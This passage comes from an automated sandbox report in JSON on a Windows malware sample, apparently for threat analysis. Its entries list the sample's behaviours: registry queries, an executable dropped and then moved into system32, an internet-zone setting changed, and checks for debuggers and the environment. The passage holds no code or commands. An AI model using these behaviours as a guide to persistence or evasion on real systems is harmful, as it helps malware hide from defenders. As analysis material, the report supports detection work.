monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\jwifylqa.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"jwifylqa.exe.67B73C09.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"jwifylqa.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\jwifylqa.exe]- [targetUID: 00000000-00002632]\n \"JWIFYLQA.EXE.67B73C0A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jwifylqa.exe\" to \"%WINDIR%\\system32\\qmuelfhl\\jwifylqa.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00005392-00000105-363374 [PID: 5392]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005392-00000105-1242759 [PID: 5392]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005392-00000105-3709334 [PID: 5392]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005392-00000105-4028692 [PID: 5392]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005392-00000105-5046766 [PID: 5392]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005392-00000105-5301414 [PID: 5392]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005392-00000105-6036015 [PID: 5392]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00005312-00000105-77148 [PID: 5312]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00005312-00000105-1494004 [PID: 5312]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F1D0000\n \"jwifylqa.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F1D0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F1D0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00005392-00000105-9348182", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" queries volume information of \"C:\\\" at 00000000-00002632-0000010C-1356679\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" queries volume information of \"C:\\\" at 00000000-00002632-0000010C-1358148\n \"jwifylqa.exe\" queries volume information of \"C:\\\" at 00000000-00003564-0000010C-2625511\n \"jwifylqa.exe\" queries volume information of \"C:\\\" at 00000000-00003564-0000010C-2627126\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-53197\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-1799655\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-2235314\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-2237545", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5ce2764379e374ffffffff0c0000004c62e2761f79e374ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2f0000000000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006b0600000088ea6775ecf91200b344246b88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b40000974e64fbcf51200616b400088000000f822410081a86775ecf912000000900100eee000000200000800000023c55e00 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7575181d250000c0fd7f9a5ce47600e0fd7fb0c95b0144c0fd7f00000000400000003f0000002500000000c0fd7fa4c95b01c15ce4766082eb762500000000c0fd7f9a5ce47600e0fd7fc8c95b015789e3768083eb761317e474d8eb7575 (UID: 00000000-00002632)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000209d0c00ccfa4400145ce376435ce37698fb44000100000094010a00010000004cfa4400935ce4764083eb76d4a0e376f5b19b7698fb4400010000000100000000e00c00000000001cfa44004cfa4400b8fa440095e1df76414f3c00feffffffd4a0e3761bbee3740000847500000000 (UID: 00000000-00002932)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000078b8330078f72e00145ce376435ce37644f82e00010000009401310001000000f8f62e00935ce4764083eb76d4a0e376aaa5f17644f82e000100000001000000e0bf330000000000c8f62e00f8f62e0064f72e0095e1df76aa573c00feffffffd4a0e3761bbee3740000847500000000 (UID: 00000000-00002356)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000040ad420064fc3e00145ce376435ce37630fd3e00010000009401400001000000e4fb3e00935ce4764083eb76d4a0e3761fa1e17630fd3e000100000001000000e8df420000000000b4fb3e00e4fb3e0050fc3e0095e1df76035e3c00feffffffd4a0e3761bbee3740000847500000000 (UID: 00000000-00001072)\n \"jwifylqa.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5ce2764379e374ffffffff0c0000004c62e2761f79e374ffffffff0c00000064ec120004000000000400000100000078ec12000a0e170000000000 (UID: 00000000-00003564)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" queries volume information of \"C:\\\" at 00000000-00002632-0000010C-1356679\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" queries volume information of \"C:\\\" at 00000000-00002632-0000010C-1358148\n \"jwifylqa.exe\" queries volume information of \"C:\\\" at 00000000-00003564-0000010C-2625511\n \"jwifylqa.exe\" queries volume information of \"C:\\\" at 00000000-00003564-0000010C-2627126\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-53197\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-1799655\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-2235314\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005312-0000010C-2237545", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6e00fce2120080f40c7500006e000000000089f40c756ea7c74f0200000070e312006ce3120064e2120068e2120018e4120095e1df761d053c00c0e21200c83a167534e31200d58c0e7570e3120004e3120042a40c75a802167544e31200d2f40c75080000006ef50c7544f50c75d6a6c74f0200000070aa1d6f0000130026bb1d6f18e31200020000000000130070aa1d6f48e3120042a40c75a80216758ce3120010a91d6f08000000e6a81d6ffbd7fb4f0200000070aa1d6f0000130026bb1d6fac0e6e00780e6e0058e312008050296f18e41200f9f2216f9f9cf420 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000937977f80300000044e55b01e965af4e680700008ce55b01c0e45b01590000000300000048e45b0150e45b0118e65b0150b8256b4d0ed324feffffff98e55b016fe4246b937977f898e55b017ce4246b060000000000446a010000008fe4246b3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e55b01000000008e00000044e65b01feffffffcce55b01cf00e476d600e476c1fc84778e0000004700000044e65b0100000000a0e55b010000000008e65b01 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360052faae4e44de5b016d8299768461250004010000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310038006400660034006100650038006200380062003600660032006400640064003700310036003100630066003800340038003800390037006400330064003500610032003600610039003300320034006300380038003500310033003200330064002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2be376fdd18477d8eb7575ac011d0000001d0000000000000000000300ed00c2000000000000000000000000000000000000000400e800c2000000000000000000000008701d0000000000200000000000000000000000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00e0422800000000003e00003e340000c008452800105d2800003c2500f001000000001d0004000000e0422800acee5b010464e37638011d00e063e376a1f784770000000000001d00e84228006dd16775c2ae8e4e6cae9e760000000000000000ec010000105d2800d82f1d000100000000001d0050011d000c000000e8422800d82f1d0002000002180000005b20007b820000000000000000000000030000004cee5b01820000007f070000000000005b20007b02000000c0756f75105d280000000000c0756f7568ee5b01e8301d0000000000d82f1d00c0ee5b01ff2be376 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000912a576c0300000044e55b01e965af4ea41200008ce55b01c0e45b015b0000000300000048e45b0150e45b0118e65b0150b8256b4d0ed324feffffff98e55b016fe4246b912a576c98e55b017ce4246b820500000000446a010000008fe4246b3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00906d2800000000003e00003e340000c0b86f280078e9240030732800f001000000001d0004000000906d2800acee5b010464e37638011d00e063e376a1f784770000000000001d00986d28006dd16775c2ae8e4e6cae9e760000000000000000e000000078e92400d82f1d000100000000001d0050011d000c000000986d2800d82f1d0002000002180000000d03000e820000000000000000000000030000004cee5b01820000008d02000000000000672e004902000000c0756f75b0fc280000000000c0756f7568ee5b014c301d0000000000d82f1d00c0ee5b01ff2be376 (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000dd806c580300000044e55b01e965af4e1c1300008ce55b01c0e45b015b0000000300000048e45b0150e45b0118e65b0150b8256b4d0ed324feffffff98e55b016fe4246bdd806c5898e55b017ce4246b820500000000446a010000008fe4246b3333ff048205000006000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002632)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003100)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00005312)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002632)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"IsWow64Process\" with parameter \"2632\" - (UID: 00000000-00002632)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00002632-2289-269-0040B211\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00003564-7202-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, 